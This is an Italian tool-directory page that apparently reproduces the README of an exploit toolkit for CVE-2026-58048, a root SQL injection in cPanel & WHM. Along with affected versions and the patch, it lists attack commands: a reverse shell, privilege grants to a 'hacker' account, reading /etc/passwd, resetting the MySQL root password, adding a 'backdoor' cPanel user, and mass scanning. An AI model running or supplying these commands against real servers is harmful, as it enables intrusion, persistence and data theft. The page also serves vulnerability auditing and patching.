Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – Toolkit per l'Esecuzione SQL come Root su cPanel (CVSS 9.4) | Suite completa Red/Blue Team Toolkit per cPanel & WHM 11.x non patchati. 2 strumenti: Safe Checker (audit/reporting), Weaponized (reverse shell, persistenza, UDF RCE, deployment, lettura/scrittura file, operazioni su database, scansione di massa). Con Python. 🦾 Usa in modo etico, rimani legale <3 | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
RicognizioneScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingRed TeamingRisposta agli Incidenti

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sicurezza dei Database
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

Vedi Repository
5251 mese faNon ancora revisionato

Informazioni

👾 CVE-2026-58048 – Toolkit per l'Esecuzione SQL come Root su cPanel (CVSS 9.4) | Suite completa Red/Blue Team Toolkit per cPanel & WHM 11.x non patchati. 2 strumenti: Safe Checker (audit/reporting), Weaponized (reverse shell, persistenza, UDF RCE, deployment, lettura/scrittura file, operazioni su database, scansione di massa). Con Python. 🦾 Usa in modo etico, rimani legale <3

Condividi

CVEPoC

💥 CVE‑2026‑58048 – Toolkit di Esecuzione SQL Root su cPanel

Python 3.8+ CVSS Author cPanel

⚠️ SOLO USO ETICO – TEST DI SICUREZZA AUTORIZZATI
Questo repository fornisce strumenti esclusivamente per professionisti della sicurezza autorizzati, blue team e penetration tester.
L'accesso non autorizzato a sistemi informatici è illegale ai sensi del CFAA (USA), Computer Misuse Act (Regno Unito), TCK 243/244 (Turchia) e leggi simili in tutto il mondo.


📖 Panoramica della Vulnerabilità

CVE‑2026‑58048 è una vulnerabilità critica di SQL injection in cPanel & WHM versioni che consente a un utente cPanel autenticato di eseguire comandi SQL arbitrari con tramite la funzionalità di rinomina del database.

11.x
privilegi root di MySQL

Come funziona

  1. Accesso autenticato richiesto – l'attaccante deve disporre di un account cPanel valido (username/password) sul server di destinazione.
  2. Manipolazione della modalità SQL – l'exploit imposta la sessione MySQL in modalità ANSI_QUOTES, che modifica il comportamento di parsing.
  3. Injection nella rinomina del database – durante la rinomina di un database, il nuovo nome non viene adeguatamente sanificato, consentendo all'attaccante di iniettare istruzioni SQL arbitrarie.
  4. Privilegi root – poiché l'operazione di rinomina viene eseguita con privilegi root di MySQL, l'SQL iniettato viene eseguito con i massimi permessi sul database.
  5. Impatto – takeover completo del database, escalation di privilegi, compromissione del server, furto di dati, backdoor e movimento laterale. Aggiornare immediatamente!

Versioni Affette

  • cPanel & WHM 11.110 e precedenti – vulnerabili
  • 11.111 – 11.118 – vulnerabili
  • 11.119 – 11.126 – vulnerabili
  • 11.127 – 11.134 – vulnerabili
  • 11.135 – 11.136 – vulnerabili
  • 11.137.x – vulnerabili sotto 11.137.1.6
  • 11.138.1.6 e successive – corrette

Patch

  • Aggiornare a cPanel & WHM 11.138.1.6 o versioni successive.
  • Se l'aggiornamento non è possibile, disabilitare le operazioni di rinomina MySQL per gli utenti cPanel come soluzione temporanea.

🧰 Strumenti

StrumentoScopoUtente Previsto
exploit.pyToolkit completo weaponizzato con reverse shell, persistenza, UDF RCE, lettura/scrittura file, operazioni sul database, supporto proxy e scansione di massa.Red team / pentester autorizzati
safecheck.pyVerificatore di vulnerabilità non intrusivo che rileva la versione di cPanel e valuta il rischio senza eseguire alcun payload malevolo. Genera report dettagliati.Blue team / auditor di sicurezza

📊 Confronto delle Funzionalità

Funzionalitàexploit.pysafecheck.py
Rilevamento vulnerabilità✅✅
Rilevamento versione✅✅
SQL injection root MySQL✅❌
Reverse shell✅❌
Persistenza (creazione utente cPanel)✅❌
UDF RCE (esecuzione comandi)✅❌
Lettura/scrittura file✅❌
Operazioni sul database (qualsiasi SQL)✅❌
Supporto proxy✅✅
Scansione di massa (multi‑thread)✅❌
Shell interattiva✅❌
Modalità non intrusiva (sicura)❌✅
Modalità Verbose/Debug✅✅
Controllo verifica SSL✅✅
User‑Agent personalizzato✅✅
Ritardo richieste / tentativi✅❌
Output JSON / report✅✅
Verifica accessibilità endpoint❌✅
Rilevamento leakage modalità SQL❌✅

🎯 Riepilogo dei Casi d'Uso

ScenarioStrumento Consigliato
Blue Team – verificare se la propria installazione cPanel è vulnerabilesafecheck.py
Audit di Sicurezza – valutazione di vulnerabilità non intrusivasafecheck.py
Red Team – penetration testing autorizzato con sfruttamento completoexploit.py
Bug Bounty – test per divulgazione responsabilesafecheck.py
Scansione di Massa – verifica di più target per la vulnerabilitàexploit.py (solo rilevamento)
Incident Response – verifica se i sistemi sono compromessisafecheck.py

⚙️ Installazione

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 Parametri

Parametri di exploit.py

ParametroDescrizione
-t, --targetURL cPanel di destinazione (es. https://cpanel.example.com:2083)
-l, --target-fileFile contenente la lista dei target (uno per riga) per la scansione di massa
-u, --mysql-userUsername cPanel/MySQL
-P, --mysql-passPassword cPanel/MySQL
--mysql-portPorta MySQL (default: 3306)
-p, --portSovrascrive la porta cPanel (default dall'URL o 2083)
--threadsNumero di thread per multi‑target (default: 10)
-o, --outputSalva i risultati su file (target singolo)
--logFile di log per output dettagliato
-v, --verboseOutput dettagliato
--proxyProxy HTTP/HTTPS (es. http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent personalizzato
--no-keep-aliveNon mantenere la sessione attiva
--delayRitardo tra le richieste (default: 2.0s)
--max-retriesNumero massimo di tentativi (default: 3)
--ssl-verifyVerifica i certificati SSL
--cmdComando da eseguire (prefisso con sql: o udf: per specificare)
--injectSQL personalizzato da iniettare (sovrascrive altre azioni)
--reverse-shellIP:PORT della reverse shell (usa UDF)
--passwdCambia la password root di MySQL
--adduserCrea utente cPanel (USER DOMAIN PASSWORD)

Parametri di safecheck.py

ParametroDescrizione
-t, --targetURL cPanel di destinazione (es. https://cpanel.example.com:2083)
-v, --verboseOutput dettagliato
--proxyProxy HTTP/HTTPS (es. http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent personalizzato
--ssl-verifyVerifica i certificati SSL
--timeoutTimeout richiesta in secondi (default: 10)
--logSalva il report su file
--jsonOutput dei risultati in formato JSON

💥 Scenari

#ScenarioComando
1Verifica rapida della vulnerabilitàpython safecheck.py -t https://cpanel.example.com:2083
2Scansione dettagliata con reportpython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Esegui SQL personalizzato (root)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5Leggi file sensibilepython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Cambia la password root di MySQLpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Crea nuovo utente cPanel (persistenza)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell interattiva dopo l'exploitationpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Scansione di massa da filepython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10Usa proxy e User‑Agent personalizzatopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"

🧪 Utilizzo Endpoint & API

L'exploit utilizza i seguenti endpoint UAPI di cPanel:

EndpointScopo
/execute/Mysql/create_databaseCrea database temporaneo
/execute/Mysql/delete_databasePulisce i database creati
/execute/Mysql/rename_databaseEndpoint vulnerabile – attiva la SQL injection
/execute/Version/get_versionAutenticazione e verifica versione
/execute/UserManager/create_userCrea nuovo utente cPanel (persistenza)
/execute/UserManager/list_usersElenca gli utenti esistenti

🛡️ Uso Responsabile

  • Usa questi strumenti solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta ai test.
  • L'accesso non autorizzato è illegale e non etico.
  • Gli autori non sono responsabili per qualsiasi uso improprio.
  • Rispetta sempre le leggi e i regolamenti del tuo paese.

Questo software è fornito solo a scopo educativo e per test di sicurezza autorizzati.

Scarica lo strumento
--readLegge un file tramite LOAD_FILE
-i, --interactiveShell interattiva dopo l'exploit
--verifyVerifica il successo dell'exploit tentando il login MySQL
--pingEsegue il ping del target prima dell'exploitation